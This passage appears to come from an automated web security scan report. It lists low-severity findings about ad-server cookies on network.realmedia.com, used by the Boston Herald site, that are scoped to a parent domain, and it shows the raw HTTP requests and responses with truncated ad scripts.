Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:18 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:21 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:06:27 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:57:29 GMT;path=/

document.write ('<iframe src="http://view.atdmt.com/MDS/iview/289553367/direct/01/857611358?click=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/
...[SNIP]...

10.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:35:25 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:26:28 GMT;path=/

document.write ('<iframe src="http://view.atdmt.com/MDS/iview/289553367/direct/01/219928446?click=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/
...[SNIP]...

10.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of

Response

10.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:36 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2979
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 06:22:37 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.114. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.115. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:15 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

